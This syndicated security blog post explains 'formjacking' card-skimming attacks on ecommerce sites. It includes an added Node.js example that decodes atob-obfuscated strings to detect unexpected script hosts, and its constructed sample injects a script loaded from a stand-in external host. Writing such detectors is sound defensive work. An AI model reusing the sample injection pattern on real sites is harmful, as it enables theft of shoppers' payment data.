Ecommerce “Formjacking” is Attackers’ New Kind of Card Skimming


With the explosion of ecommerce in the last several years, attackers see an attractive, and unguarded, frontier for stealing consumer information.


Source: Krebs on Security

The details: Security researcher Brian Krebs details a prevalent kind of hack targeted at ecommerce sites with the intent of stealing shopper data through online forms, including credit and debit card numbers. Krebs was able to identify legitimate ecommerce sites that have been infected with malicious code, most often JavaScript, which redirects shoppers to malicious copycat sites that are then able to steal the users’ information.

Known as “formjacking,” this kind of hacking is on the rise as ecommerce becomes more prevalent and physical credit and debit card fraud becomes more difficult to achieve with the introduction of chip-based cards in the United States. Attackers often obfuscate their code on infected sites with a custom HTML function—window.atob—which “scrambles the code referencing those domain names on hacked sites.”
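window.atob is the browser's Base64 decoder, so a hostname hidden this way can be recovered by decoding the string literals passed to it. The following is an added example, not code from the original post or from Krebs's research: a Node.js check that scans script source for such calls and reports decoded hostnames missing from an allowlist. The allowlist, sample script and function names are constructed for illustration.

```javascript
// Added example: recover hostnames hidden behind atob() literals in page scripts.
// Constructed allowlist of hosts this hypothetical shop is expected to load from.
const ALLOWED_HOSTS = new Set(['shop.example', 'cdn.shop.example']);

// atob("...") or window.atob('...') called directly on a Base64 string literal.
const ATOB_LITERAL = /\batob\s*\(\s*(["'`])([A-Za-z0-9+\/=]{8,})\1\s*\)/g;
// Hostname part of an absolute or protocol-relative URL in the decoded text.
const URL_HOST = /\/\/([a-z0-9.-]+\.[a-z]{2,})/gi;

// Returns one finding per decoded hostname that is not on the allowlist.
function findHiddenHosts(source, allowedHosts = ALLOWED_HOSTS) {
  const findings = [];
  for (const call of source.matchAll(ATOB_LITERAL)) {
    // Decode the literal the same way the browser would at run time.
    const decoded = Buffer.from(call[2], 'base64').toString('latin1');
    const line = source.slice(0, call.index).split('\n').length;
    for (const ref of decoded.matchAll(URL_HOST)) {
      const host = ref[1].toLowerCase();
      if (!allowedHosts.has(host)) findings.push({ line, host, decoded });
    }
  }
  return findings;
}

// Constructed sample script; the Base64 is generated here so it stays readable.
const b64 = (s) => Buffer.from(s, 'latin1').toString('base64');
const SAMPLE_SCRIPT = [
  'var lib = window.atob("' + b64('https://cdn.shop.example/cart.js') + '");',
  'var s = document.createElement("script");',
  "s.src = atob('" + b64('//stats.collector.example/c.js') + "');",
  'document.head.appendChild(s);',
].join('\n');

for (const f of findHiddenHosts(SAMPLE_SCRIPT)) {
  console.log(`line ${f.line}: unexpected host ${f.host} (decoded: ${f.decoded})`);
}
```

The check only sees string literals passed directly to atob, so strings that are concatenated or computed at run time will not appear in its output. Treat a clean result as one signal alongside file-integrity monitoring, not as proof that a page is unmodified.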

Symantec says that it has blocked almost a quarter of a million instances of formjacking since August of this year.

Why it matters: Krebs notes that formjacking is the digital equivalent of traditional card skimming techniques, which placed physical devices in public ATMs and gas pumps:

“I like the comparison to skimming because online merchants are being targeted in a major way right now precisely because of efforts to make it hard for thieves to make money from fraud involving counterfeit debit and credit cards. The United States is the last of the G20 nations to make the transition to more secure chip-based payment cards, and virtually every other country that has already been through that shift has seen a marked increase in online fraud as a result.”

Many ecommerce sites are run in a pseudo-professional fashion with website administrators who do not know how to identify malicious code on their own sites. For admins who need assistance, Krebs suggests tools to help monitor a site for unauthorized changes such as Tripwire and AIDE or subscription services “” and “”

The hacker perspective:

Eric “McGyver” McIntyre, director of research and development at Randori, says:

“When you visit a website—even if that site is served via TLS (i.e. you access it via an HTTPS URL)—you are trusting that site, and everything that site trusts. Either by a cross-domain reference, as Krebs is discussing, or, increasingly, by the developers of the site directly relying on third-party dependencies they have neither the time nor the resources to review (Node packages, for example). Every additional domain reference or third-party package is a risk multiplier. These days there isn’t a good way for most people to quantify the risk posed by any particular page.”

*** This is a Security Bloggers Network syndicated blog from Code Red authored by Dan Rowinski. Read the original post at: